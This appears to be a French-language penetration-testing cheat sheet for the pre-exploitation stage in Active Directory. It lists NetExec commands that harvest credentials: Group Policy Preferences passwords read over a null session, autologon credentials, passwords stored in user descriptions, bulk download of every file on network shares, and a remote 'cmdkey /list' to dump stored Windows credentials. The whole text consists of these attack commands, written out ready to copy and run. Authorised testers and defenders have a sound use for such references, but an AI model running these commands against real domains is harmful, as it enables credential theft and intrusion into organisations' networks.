Pre-Exploitation

Password in AD - Misconfigs

Trouver des credentials exposés avant d'avoir besoin d'exploiter quoi que ce soit.

Copy command

nxc smb $DC -u '' -p '' -M gpp_password

Description: GPP passwords en null session : ne nécessite pas de creds si SYSVOL est accessible.

Copy command

nxc smb $DC -u $USER -p $PASS -M gpp_autologin

Description: AutoLogon credentials dans les GPP : souvent des comptes de service ou admin.

Copy command

nxc ldap $DC -u $USER -p $PASS -M get-desc-users

Description: Descriptions des utilisateurs : fréquemment utilisées pour stocker des passwords initiaux.

Copy command

nxc smb $TARGET -u $USER -p $PASS --shares -M spider_plus -o DOWNLOAD_FLAG=True

Description: Télécharger tous les fichiers des partages pour chercher des configs avec credentials.

Copy command

nxc smb $TARGET -u $USER -p $PASS -x 'cmdkey /list'

Description: Lister les credentials Windows stockés (cmdkey) sur la machine cible.